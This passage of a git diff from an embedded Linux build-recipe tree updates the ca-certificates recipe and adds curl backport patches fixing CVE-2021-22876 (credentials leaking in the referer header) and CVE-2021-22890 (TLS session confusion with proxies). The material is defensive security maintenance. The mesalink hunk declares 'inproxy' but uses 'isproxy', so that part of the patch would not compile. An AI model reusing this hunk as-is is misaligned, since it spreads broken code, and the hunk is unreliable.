48 # USA.
49
50 import base64
51-import datetime
52 import os.path
53 import re
54 import sys
55 import textwrap
56 import io
57
58-from cryptography import x509
59-
60-
61 objects = []
62
63 # Dirty file parser.
64@@ -121,13 +117,6 @@ for obj in objects:
65 if obj['CKA_CLASS'] == 'CKO_CERTIFICATE':
66 if not obj['CKA_LABEL'] in trust or not trust[obj['CKA_LABEL']]:
67 continue
68-
69- cert = x509.load_der_x509_certificate(obj['CKA_VALUE'])
70- if cert.not_valid_after < datetime.datetime.now():
71- print('!'*74)
72- print('Trusted but expired certificate found: %s' % obj['CKA_LABEL'])
73- print('!'*74)
74-
75 bname = obj['CKA_LABEL'][1:-1].replace('/', '_')\
76 .replace(' ', '_')\
77 .replace('(', '=')\
78--
792.20.1
80
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch b/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch
deleted file mode 100644
index a113fa8b15..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch
+++ /dev/null
@@ -1,20 +0,0 @@
1Upstream-Status: Pending
2
3Let us alter the install destination of the script via SBINDIR
4
5--- ca-certificates-20130119.orig/sbin/Makefile
6+++ ca-certificates-20130119/sbin/Makefile
7@@ -3,9 +3,12 @@
8 #
9 #
10
11+SBINDIR = /usr/sbin
12+
13 all:
14
15 clean:
16
17 install:
18- install -m755 update-ca-certificates $(DESTDIR)/usr/sbin/
19+ install -d $(DESTDIR)$(SBINDIR)
20+ install -m755 update-ca-certificates $(DESTDIR)$(SBINDIR)/
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch b/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch
deleted file mode 100644
index 6e2171f758..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch
+++ /dev/null
@@ -1,34 +0,0 @@
1From 30378026d136efa779732e3f6664e2ecf461e458 Mon Sep 17 00:00:00 2001
2From: Patrick Ohly <patrick.ohly@intel.com>
3Date: Thu, 17 Mar 2016 12:38:09 +0100
4Subject: [PATCH] update-ca-certificates: support Toybox
5
6"mktemp -t" is deprecated and does not work when using Toybox. Replace
7with something that works also with Toybox.
8
9Upstream-Status: Pending
10
11Signed-off-by: Patrick Ohly <patrick.ohly@intel.com>
12---
13 sbin/update-ca-certificates | 6 +++---
14 1 file changed, 3 insertions(+), 3 deletions(-)
15
16diff --git a/sbin/update-ca-certificates b/sbin/update-ca-certificates
17index 79c41bb..ae9e3f1 100755
18--- a/sbin/update-ca-certificates
19+++ b/sbin/update-ca-certificates
20@@ -113,9 +113,9 @@ trap cleanup 0
21
22 # Helper files. (Some of them are not simple arrays because we spawn
23 # subshells later on.)
24-TEMPBUNDLE="$(mktemp -t "${CERTBUNDLE}.tmp.XXXXXX")"
25-ADDED="$(mktemp -t "ca-certificates.tmp.XXXXXX")"
26-REMOVED="$(mktemp -t "ca-certificates.tmp.XXXXXX")"
27+TEMPBUNDLE="$(mktemp -p${TMPDIR:-/tmp} "${CERTBUNDLE}.tmp.XXXXXX")"
28+ADDED="$(mktemp -p${TMPDIR:-/tmp} "ca-certificates.tmp.XXXXXX")"
29+REMOVED="$(mktemp -p${TMPDIR:-/tmp} "ca-certificates.tmp.XXXXXX")"
30
31 # Adds a certificate to the list of trusted ones. This includes a symlink
32 # in /etc/ssl/certs to the certificate file and its inclusion into the
33--
342.1.4
diff --git a/meta/recipes-support/ca-certificates/ca-certificates_20210119.bb b/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb
index 888a235c1a..a54d6b458a 100644
--- a/meta/recipes-support/ca-certificates/ca-certificates_20210119.bb
+++ b/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb
@@ -14,15 +14,14 @@ DEPENDS_class-nativesdk = "openssl-native"
14# Need rehash from openssl and run-parts from debianutils 14# Need rehash from openssl and run-parts from debianutils
15PACKAGE_WRITE_DEPS += "openssl-native debianutils-native" 15PACKAGE_WRITE_DEPS += "openssl-native debianutils-native"
16 16
17SRCREV = "181be7ebd169b4a6fb5d90c3e6dc791e90534144" 17SRCREV = "07de54fdcc5806bde549e1edf60738c6bccf50e8"
18 18
19SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https \ 19SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https;branch=master \
20 file://0002-update-ca-certificates-use-SYSROOT.patch \ 20 file://0002-update-ca-certificates-use-SYSROOT.patch \
21 file://0001-update-ca-certificates-don-t-use-Debianisms-in-run-p.patch \ 21 file://0001-update-ca-certificates-don-t-use-Debianisms-in-run-p.patch \
22 file://update-ca-certificates-support-Toybox.patch \
23 file://default-sysroot.patch \ 22 file://default-sysroot.patch \
24 file://sbindir.patch \
25 file://0003-update-ca-certificates-use-relative-symlinks-from-ET.patch \ 23 file://0003-update-ca-certificates-use-relative-symlinks-from-ET.patch \
24 file://0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch \
26 " 25 "
27UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+)" 26UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+)"
28 27
@@ -83,8 +82,8 @@ do_install_append_class-native () {
83 SYSROOT="${D}${base_prefix}" ${D}${sbindir}/update-ca-certificates 82 SYSROOT="${D}${base_prefix}" ${D}${sbindir}/update-ca-certificates
84} 83}
85 84
86RDEPENDS_${PN}_class-target = "openssl-bin" 85RDEPENDS_${PN}_append_class-target = " openssl-bin openssl"
87RDEPENDS_${PN}_class-native = "openssl-native" 86RDEPENDS_${PN}_append_class-native = " openssl-native"
88RDEPENDS_${PN}_class-nativesdk = "nativesdk-openssl-bin" 87RDEPENDS_${PN}_append_class-nativesdk = " nativesdk-openssl-bin nativesdk-openssl"
89 88
90BBCLASSEXTEND = "native nativesdk" 89BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/consolekit/consolekit_0.4.6.bb b/meta/recipes-support/consolekit/consolekit_0.4.6.bb
index 89f2d77b66..22e755747b 100644
--- a/meta/recipes-support/consolekit/consolekit_0.4.6.bb
+++ b/meta/recipes-support/consolekit/consolekit_0.4.6.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Framework for defining and tracking users, login sessions, and seats" 1SUMMARY = "Framework for defining and tracking users, login sessions, and seats"
2DESCRIPTION = "It provides a mechanism for software to react to changes \
3of any of these items or of any of the metadata associated with them."
2HOMEPAGE = "http://www.freedesktop.org/wiki/Software/ConsoleKit" 4HOMEPAGE = "http://www.freedesktop.org/wiki/Software/ConsoleKit"
3BUGTRACKER = "https://bugs.freedesktop.org/buglist.cgi?query_format=specific&product=ConsoleKit" 5BUGTRACKER = "https://bugs.freedesktop.org/buglist.cgi?query_format=specific&product=ConsoleKit"
4 6
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22876.patch b/meta/recipes-support/curl/curl/CVE-2021-22876.patch
new file mode 100644
index 0000000000..fc396aabef
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22876.patch
@@ -0,0 +1,59 @@
1transfer: strip credentials from the auto-referer header field
2
3CVE-2021-22876
4
5Patch taken from Ubuntu curl 7.68.0-1ubuntu2.5.
6
7Bug: https://curl.se/docs/CVE-2021-22876.html
8Upstream-Status: backport
9---
10 lib/transfer.c | 25 +++++++++++++++++++++++--
11 1 file changed, 23 insertions(+), 2 deletions(-)
12
13diff --git a/lib/transfer.c b/lib/transfer.c
14index e76834eb3..744e1c00b 100644
15--- a/lib/transfer.c
16+++ b/lib/transfer.c
17@@ -1570,6 +1570,9 @@ CURLcode Curl_follow(struct Curl_easy *data,
18 data->set.followlocation++; /* count location-followers */
19
20 if(data->set.http_auto_referer) {
21+ CURLU *u;
22+ char *referer;
23+
24 /* We are asked to automatically set the previous URL as the referer
25 when we get the next URL. We pick the ->url field, which may or may
26 not be 100% correct */
27@@ -1579,9 +1582,27 @@ CURLcode Curl_follow(struct Curl_easy *data,
28 data->change.referer_alloc = FALSE;
29 }
30
31- data->change.referer = strdup(data->change.url);
32- if(!data->change.referer)
33+ /* Make a copy of the URL without crenditals and fragment */
34+ u = curl_url();
35+ if(!u)
36+ return CURLE_OUT_OF_MEMORY;
37+
38+ uc = curl_url_set(u, CURLUPART_URL, data->change.url, 0);
39+ if(!uc)
40+ uc = curl_url_set(u, CURLUPART_FRAGMENT, NULL, 0);
41+ if(!uc)
42+ uc = curl_url_set(u, CURLUPART_USER, NULL, 0);
43+ if(!uc)
44+ uc = curl_url_set(u, CURLUPART_PASSWORD, NULL, 0);
45+ if(!uc)
46+ uc = curl_url_get(u, CURLUPART_URL, &referer, 0);
47+
48+ curl_url_cleanup(u);
49+
50+ if(uc || referer == NULL)
51 return CURLE_OUT_OF_MEMORY;
52+
53+ data->change.referer = referer;
54 data->change.referer_alloc = TRUE; /* yes, free this later */
55 }
56 }
57--
582.20.1
59
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22890.patch b/meta/recipes-support/curl/curl/CVE-2021-22890.patch
new file mode 100644
index 0000000000..8c0ecbfe7f
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22890.patch
@@ -0,0 +1,464 @@
1vtls: add 'isproxy' argument to Curl_ssl_get/addsessionid()
2
3To make sure we set and extract the correct session.
4
5Patch taken from Ubuntu curl 7.68.0-1ubuntu2.5.
6
7CVE-2021-22890
8
9Reported-by: Mingtao Yang
10Bug: https://curl.se/docs/CVE-2021-22890.html
11Upstream-Status: backport
12---
13 lib/vtls/bearssl.c | 9 +++++---
14 lib/vtls/gtls.c | 9 +++++---
15 lib/vtls/mbedtls.c | 8 ++++---
16 lib/vtls/mesalink.c | 9 +++++---
17 lib/vtls/openssl.c | 52 ++++++++++++++++++++++++++++++++++----------
18 lib/vtls/schannel.c | 10 +++++----
19 lib/vtls/sectransp.c | 9 ++++----
20 lib/vtls/vtls.c | 9 ++++++--
21 lib/vtls/vtls.h | 2 ++
22 lib/vtls/wolfssl.c | 8 ++++---
23 10 files changed, 88 insertions(+), 37 deletions(-)
24
25diff --git a/lib/vtls/bearssl.c b/lib/vtls/bearssl.c
26index 67f945831..32cb0a4c2 100644
27--- a/lib/vtls/bearssl.c
28+++ b/lib/vtls/bearssl.c
29@@ -372,7 +372,8 @@ static CURLcode bearssl_connect_step1(struct connectdata *conn, int sockindex)
30 void *session;
31
32 Curl_ssl_sessionid_lock(conn);
33- if(!Curl_ssl_getsessionid(conn, &session, NULL, sockindex)) {
34+ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
35+ &session, NULL, sockindex)) {
36 br_ssl_engine_set_session_parameters(&BACKEND->ctx.eng, session);
37 infof(data, "BearSSL: re-using session ID\n");
38 }
39@@ -560,10 +561,12 @@ static CURLcode bearssl_connect_step3(struct connectdata *conn, int sockindex)
40 return CURLE_OUT_OF_MEMORY;
41 br_ssl_engine_get_session_parameters(&BACKEND->ctx.eng, session);
42 Curl_ssl_sessionid_lock(conn);
43- incache = !(Curl_ssl_getsessionid(conn, &oldsession, NULL, sockindex));
44+ incache = !(Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
45+ &oldsession, NULL, sockindex));
46 if(incache)
47 Curl_ssl_delsessionid(conn, oldsession);
48- ret = Curl_ssl_addsessionid(conn, session, 0, sockindex);
49+ ret = Curl_ssl_addsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
50+ session, 0, sockindex);
51 Curl_ssl_sessionid_unlock(conn);
52 if(ret) {
53 free(session);
54diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
55index 5f740eeba..46e149c7d 100644
56--- a/lib/vtls/gtls.c
57+++ b/lib/vtls/gtls.c
58@@ -937,7 +937,8 @@ gtls_connect_step1(struct connectdata *conn,
59 size_t ssl_idsize;
60
61 Curl_ssl_sessionid_lock(conn);
62- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, &ssl_idsize, sockindex)) {
63+ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
64+ &ssl_sessionid, &ssl_idsize, sockindex)) {
65 /* we got a session id, use it! */
66 gnutls_session_set_data(session, ssl_sessionid, ssl_idsize);
67
68@@ -1485,7 +1486,8 @@ gtls_connect_step3(struct connectdata *conn,
69 gnutls_session_get_data(session, connect_sessionid, &connect_idsize);
70
71 Curl_ssl_sessionid_lock(conn);
72- incache = !(Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL,
73+ incache = !(Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
74+ &ssl_sessionid, NULL,
75 sockindex));
76 if(incache) {
77 /* there was one before in the cache, so instead of risking that the
78@@ -1494,7 +1496,8 @@ gtls_connect_step3(struct connectdata *conn,
79 }
80
81 /* store this session id */
82- result = Curl_ssl_addsessionid(conn, connect_sessionid, connect_idsize,
83+ result = Curl_ssl_addsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
84+ connect_sessionid, connect_idsize,
85 sockindex);
86 Curl_ssl_sessionid_unlock(conn);
87 if(result) {
88diff --git a/lib/vtls/mbedtls.c b/lib/vtls/mbedtls.c
89index f057315f3..19df8478e 100644
90--- a/lib/vtls/mbedtls.c
91+++ b/lib/vtls/mbedtls.c
92@@ -453,7 +453,8 @@ mbed_connect_step1(struct connectdata *conn,
93 void *old_session = NULL;
94
95 Curl_ssl_sessionid_lock(conn);
96- if(!Curl_ssl_getsessionid(conn, &old_session, NULL, sockindex)) {
97+ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
98+ &old_session, NULL, sockindex)) {
99 ret = mbedtls_ssl_set_session(&BACKEND->ssl, old_session);
100 if(ret) {
101 Curl_ssl_sessionid_unlock(conn);
102@@ -709,6 +710,7 @@ mbed_connect_step3(struct connectdata *conn,
103 int ret;
104 mbedtls_ssl_session *our_ssl_sessionid;
105 void *old_ssl_sessionid = NULL;
106+ bool isproxy = SSL_IS_PROXY() ? TRUE : FALSE;
107
108 our_ssl_sessionid = malloc(sizeof(mbedtls_ssl_session));
109 if(!our_ssl_sessionid)
110@@ -727,10 +729,10 @@ mbed_connect_step3(struct connectdata *conn,
111
112 /* If there's already a matching session in the cache, delete it */
113 Curl_ssl_sessionid_lock(conn);
114- if(!Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL, sockindex))
115+ if(!Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid, NULL, sockindex))
116 Curl_ssl_delsessionid(conn, old_ssl_sessionid);
117
118- retcode = Curl_ssl_addsessionid(conn, our_ssl_sessionid, 0, sockindex);
119+ retcode = Curl_ssl_addsessionid(conn, isproxy, our_ssl_sessionid, 0, sockindex);
120 Curl_ssl_sessionid_unlock(conn);
121 if(retcode) {
122 mbedtls_ssl_session_free(our_ssl_sessionid);
123diff --git a/lib/vtls/mesalink.c b/lib/vtls/mesalink.c
124index cab1e390b..79d1e3dfa 100644
125--- a/lib/vtls/mesalink.c
126+++ b/lib/vtls/mesalink.c
127@@ -263,7 +263,8 @@ mesalink_connect_step1(struct connectdata *conn, int sockindex)
128 void *ssl_sessionid = NULL;
129
130 Curl_ssl_sessionid_lock(conn);
131- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
132+ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
133+ &ssl_sessionid, NULL, sockindex)) {
134 /* we got a session id, use it! */
135 if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
136 Curl_ssl_sessionid_unlock(conn);
137@@ -347,12 +348,14 @@ mesalink_connect_step3(struct connectdata *conn, int sockindex)
138 bool incache;
139 SSL_SESSION *our_ssl_sessionid;
140 void *old_ssl_sessionid = NULL;
141+ bool inproxy = SSL_IS_PROXY() ? TRUE : FALSE;
142
143 our_ssl_sessionid = SSL_get_session(BACKEND->handle);
144
145 Curl_ssl_sessionid_lock(conn);
146 incache =
147- !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL, sockindex));
148+ !(Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid,
149+ NULL, sockindex));
150 if(incache) {
151 if(old_ssl_sessionid != our_ssl_sessionid) {
152 infof(data, "old SSL session ID is stale, removing\n");
153@@ -363,7 +366,7 @@ mesalink_connect_step3(struct connectdata *conn, int sockindex)
154
155 if(!incache) {
156 result = Curl_ssl_addsessionid(
157- conn, our_ssl_sessionid, 0 /* unknown size */, sockindex);
158+ conn, isproxy, our_ssl_sessionid, 0 /* unknown size */, sockindex);
159 if(result) {
160 Curl_ssl_sessionid_unlock(conn);
161 failf(data, "failed to store ssl session");
162diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
163index 1d09cadca..64f43605a 100644
164--- a/lib/vtls/openssl.c
165+++ b/lib/vtls/openssl.c
166@@ -422,12 +422,23 @@ static int ossl_get_ssl_conn_index(void)
167 */
168 static int ossl_get_ssl_sockindex_index(void)
169 {
170- static int ssl_ex_data_sockindex_index = -1;
171- if(ssl_ex_data_sockindex_index < 0) {
172- ssl_ex_data_sockindex_index = SSL_get_ex_new_index(0, NULL, NULL, NULL,
173- NULL);
174+ static int sockindex_index = -1;
175+ if(sockindex_index < 0) {
176+ sockindex_index = SSL_get_ex_new_index(0, NULL, NULL, NULL, NULL);
177 }
178- return ssl_ex_data_sockindex_index;
179+ return sockindex_index;
180+}
181+
182+/* Return an extra data index for proxy boolean.
183+ * This index can be used with SSL_get_ex_data() and SSL_set_ex_data().
184+ */
185+static int ossl_get_proxy_index(void)
186+{
187+ static int proxy_index = -1;
188+ if(proxy_index < 0) {
189+ proxy_index = SSL_get_ex_new_index(0, NULL, NULL, NULL, NULL);
190+ }
191+ return proxy_index;
192 }
193
194 static int passwd_callback(char *buf, int num, int encrypting,
195@@ -1079,7 +1090,8 @@ static int Curl_ossl_init(void)
196 #endif
197
198 /* Initialize the extra data indexes */
199- if(ossl_get_ssl_conn_index() < 0 || ossl_get_ssl_sockindex_index() < 0)
200+ if(ossl_get_ssl_conn_index() < 0 || ossl_get_ssl_sockindex_index() < 0 ||
201+ ossl_get_proxy_index() < 0)
202 return 0;
203
204 return 1;
205@@ -2341,8 +2353,10 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
206 curl_socket_t *sockindex_ptr;
207 int connectdata_idx = ossl_get_ssl_conn_index();
208 int sockindex_idx = ossl_get_ssl_sockindex_index();
209+ int proxy_idx = ossl_get_proxy_index();
210+ bool isproxy;
211
212- if(connectdata_idx < 0 || sockindex_idx < 0)
213+ if(connectdata_idx < 0 || sockindex_idx < 0 || proxy_idx < 0)
214 return 0;
215
216 conn = (struct connectdata*) SSL_get_ex_data(ssl, connectdata_idx);
217@@ -2355,13 +2369,18 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
218 sockindex_ptr = (curl_socket_t*) SSL_get_ex_data(ssl, sockindex_idx);
219 sockindex = (int)(sockindex_ptr - conn->sock);
220
221+ isproxy = SSL_get_ex_data(ssl, proxy_idx) ? TRUE : FALSE;
222+
223 if(SSL_SET_OPTION(primary.sessionid)) {
224 bool incache;
225 void *old_ssl_sessionid = NULL;
226
227 Curl_ssl_sessionid_lock(conn);
228- incache = !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL,
229- sockindex));
230+ if(isproxy)
231+ incache = FALSE;
232+ else
233+ incache = !(Curl_ssl_getsessionid(conn, isproxy,
234+ &old_ssl_sessionid, NULL, sockindex));
235 if(incache) {
236 if(old_ssl_sessionid != ssl_sessionid) {
237 infof(data, "old SSL session ID is stale, removing\n");
238@@ -2371,7 +2390,7 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
239 }
240
241 if(!incache) {
242- if(!Curl_ssl_addsessionid(conn, ssl_sessionid,
243+ if(!Curl_ssl_addsessionid(conn, isproxy, ssl_sessionid,
244 0 /* unknown size */, sockindex)) {
245 /* the session has been put into the session cache */
246 res = 1;
247@@ -2868,16 +2887,25 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
248 void *ssl_sessionid = NULL;
249 int connectdata_idx = ossl_get_ssl_conn_index();
250 int sockindex_idx = ossl_get_ssl_sockindex_index();
251+ int proxy_idx = ossl_get_proxy_index();
252
253- if(connectdata_idx >= 0 && sockindex_idx >= 0) {
254+ if(connectdata_idx >= 0 && sockindex_idx >= 0 && proxy_idx >= 0) {
255 /* Store the data needed for the "new session" callback.
256 * The sockindex is stored as a pointer to an array element. */
257 SSL_set_ex_data(BACKEND->handle, connectdata_idx, conn);
258 SSL_set_ex_data(BACKEND->handle, sockindex_idx, conn->sock + sockindex);
259+#ifndef CURL_DISABLE_PROXY
260+ SSL_set_ex_data(BACKEND->handle, proxy_idx, SSL_IS_PROXY() ? (void *) 1:
261+ NULL);
262+#else
263+ SSL_set_ex_data(BACKEND->handle, proxy_idx, NULL);
264+#endif
265+
266 }
267
268 Curl_ssl_sessionid_lock(conn);
269- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
270+ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
271+ &ssl_sessionid, NULL, sockindex)) {
272 /* we got a session id, use it! */
273 if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
274 Curl_ssl_sessionid_unlock(conn);
275diff --git a/lib/vtls/schannel.c b/lib/vtls/schannel.c
276index f665ee340..a354ce95d 100644
277--- a/lib/vtls/schannel.c
278+++ b/lib/vtls/schannel.c
279@@ -487,7 +487,8 @@ schannel_connect_step1(struct connectdata *conn, int sockindex)
280 /* check for an existing re-usable credential handle */
281 if(SSL_SET_OPTION(primary.sessionid)) {
282 Curl_ssl_sessionid_lock(conn);
283- if(!Curl_ssl_getsessionid(conn, (void **)&old_cred, NULL, sockindex)) {
284+ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
285+ (void **)&old_cred, NULL, sockindex)) {
286 BACKEND->cred = old_cred;
287 DEBUGF(infof(data, "schannel: re-using existing credential handle\n"));
288
289@@ -1193,8 +1194,9 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
290 struct ssl_connect_data *connssl = &conn->ssl[sockindex];
291 SECURITY_STATUS sspi_status = SEC_E_OK;
292 CERT_CONTEXT *ccert_context = NULL;
293+ bool isproxy = SSL_IS_PROXY();
294 #ifdef DEBUGBUILD
295- const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
296+ const char * const hostname = isproxy ? conn->http_proxy.host.name :
297 conn->host.name;
298 #endif
299 #ifdef HAS_ALPN
300@@ -1268,7 +1270,7 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
301 struct curl_schannel_cred *old_cred = NULL;
302
303 Curl_ssl_sessionid_lock(conn);
304- incache = !(Curl_ssl_getsessionid(conn, (void **)&old_cred, NULL,
305+ incache = !(Curl_ssl_getsessionid(conn, isproxy, (void **)&old_cred, NULL,
306 sockindex));
307 if(incache) {
308 if(old_cred != BACKEND->cred) {
309@@ -1280,7 +1282,7 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
310 }
311 }
312 if(!incache) {
313- result = Curl_ssl_addsessionid(conn, (void *)BACKEND->cred,
314+ result = Curl_ssl_addsessionid(conn, isproxy, (void *)BACKEND->cred,
315 sizeof(struct curl_schannel_cred),
316 sockindex);
317 if(result) {
318diff --git a/lib/vtls/sectransp.c b/lib/vtls/sectransp.c
319index 7dd028fb7..9c67d465a 100644
320--- a/lib/vtls/sectransp.c
321+++ b/lib/vtls/sectransp.c
322@@ -1376,7 +1376,8 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
323 const char * const ssl_cafile = SSL_CONN_CONFIG(CAfile);
324 const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
325 char * const ssl_cert = SSL_SET_OPTION(cert);
326- const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
327+ bool isproxy = SSL_IS_PROXY();
328+ const char * const hostname = isproxy ? conn->http_proxy.host.name :
329 conn->host.name;
330 const long int port = SSL_IS_PROXY() ? conn->port : conn->remote_port;
331 #ifdef ENABLE_IPV6
332@@ -1584,7 +1585,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
333
334 #ifdef USE_NGHTTP2
335 if(data->set.httpversion >= CURL_HTTP_VERSION_2 &&
336- (!SSL_IS_PROXY() || !conn->bits.tunnel_proxy)) {
337+ (!isproxy || !conn->bits.tunnel_proxy)) {
338 CFArrayAppendValue(alpnArr, CFSTR(NGHTTP2_PROTO_VERSION_ID));
339 infof(data, "ALPN, offering %s\n", NGHTTP2_PROTO_VERSION_ID);
340 }
341@@ -1916,7 +1917,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
342 size_t ssl_sessionid_len;
343
344 Curl_ssl_sessionid_lock(conn);
345- if(!Curl_ssl_getsessionid(conn, (void **)&ssl_sessionid,
346+ if(!Curl_ssl_getsessionid(conn, isproxy, (void **)&ssl_sessionid,
347 &ssl_sessionid_len, sockindex)) {
348 /* we got a session id, use it! */
349 err = SSLSetPeerID(BACKEND->ssl_ctx, ssl_sessionid, ssl_sessionid_len);
350@@ -1944,7 +1945,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
351 return CURLE_SSL_CONNECT_ERROR;
352 }
353
354- result = Curl_ssl_addsessionid(conn, ssl_sessionid, ssl_sessionid_len,
355+ result = Curl_ssl_addsessionid(conn, isproxy, ssl_sessionid, ssl_sessionid_len,
356 sockindex);
357 Curl_ssl_sessionid_unlock(conn);
358 if(result) {
359diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
360index dfefa1bd5..aaf73ef8f 100644
361--- a/lib/vtls/vtls.c
362+++ b/lib/vtls/vtls.c
363@@ -305,6 +305,7 @@ void Curl_ssl_sessionid_unlock(struct connectdata *conn)
364 * there's one suitable, it is provided. Returns TRUE when no entry matched.
365 */
366 bool Curl_ssl_getsessionid(struct connectdata *conn,
367+ const bool isProxy,
368 void **ssl_sessionid,
369 size_t *idsize, /* set 0 if unknown */
370 int sockindex)
371@@ -315,7 +316,6 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
372 long *general_age;
373 bool no_match = TRUE;
374
375- const bool isProxy = CONNECT_PROXY_SSL();
376 struct ssl_primary_config * const ssl_config = isProxy ?
377 &conn->proxy_ssl_config :
378 &conn->ssl_config;
379@@ -324,6 +324,11 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
380 int port = isProxy ? (int)conn->port : conn->remote_port;
381 *ssl_sessionid = NULL;
382
383+#ifdef CURL_DISABLE_PROXY
384+ if(isProxy)
385+ return TRUE;
386+#endif
387+
388 DEBUGASSERT(SSL_SET_OPTION(primary.sessionid));
389
390 if(!SSL_SET_OPTION(primary.sessionid))
391@@ -411,6 +416,7 @@ void Curl_ssl_delsessionid(struct connectdata *conn, void *ssl_sessionid)
392 * later on.
393 */
394 CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
395+ bool isProxy,
396 void *ssl_sessionid,
397 size_t idsize,
398 int sockindex)
399@@ -423,7 +429,6 @@ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
400 char *clone_conn_to_host;
401 int conn_to_port;
402 long *general_age;
403- const bool isProxy = CONNECT_PROXY_SSL();
404 struct ssl_primary_config * const ssl_config = isProxy ?
405 &conn->proxy_ssl_config :
406 &conn->ssl_config;
407diff --git a/lib/vtls/vtls.h b/lib/vtls/vtls.h
408index a81b2f22d..a5e348752 100644
409--- a/lib/vtls/vtls.h
410+++ b/lib/vtls/vtls.h
411@@ -202,6 +202,7 @@ void Curl_ssl_sessionid_unlock(struct connectdata *conn);
412 * under sessionid mutex).
413 */
414 bool Curl_ssl_getsessionid(struct connectdata *conn,
415+ const bool isproxy,
416 void **ssl_sessionid,
417 size_t *idsize, /* set 0 if unknown */
418 int sockindex);
419@@ -211,6 +212,7 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
420 * object with cache (e.g. incrementing refcount on success)
421 */
422 CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
423+ const bool isProxy,
424 void *ssl_sessionid,
425 size_t idsize,
426 int sockindex);
427diff --git a/lib/vtls/wolfssl.c b/lib/vtls/wolfssl.c
428index 8c2d3f4a2..dd9f907ff 100644
429--- a/lib/vtls/wolfssl.c
430+++ b/lib/vtls/wolfssl.c
431@@ -392,7 +392,8 @@ wolfssl_connect_step1(struct connectdata *conn,
432 void *ssl_sessionid = NULL;
433
434 Curl_ssl_sessionid_lock(conn);
435- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
436+ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
437+ &ssl_sessionid, NULL, sockindex)) {
438 /* we got a session id, use it! */
439 if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
440 char error_buffer[WOLFSSL_MAX_ERROR_SZ];
441@@ -618,9 +619,10 @@ wolfssl_connect_step3(struct connectdata *conn,
442 void *old_ssl_sessionid = NULL;
443
444 our_ssl_sessionid = SSL_get_session(BACKEND->handle);
445+ bool isproxy = SSL_IS_PROXY() ? TRUE : FALSE;
446
447 Curl_ssl_sessionid_lock(conn);
448- incache = !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL,
449+ incache = !(Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid, NULL,
450 sockindex));
451 if(incache) {
452 if(old_ssl_sessionid != our_ssl_sessionid) {
453@@ -631,7 +633,7 @@ wolfssl_connect_step3(struct connectdata *conn,
454 }
455
456 if(!incache) {
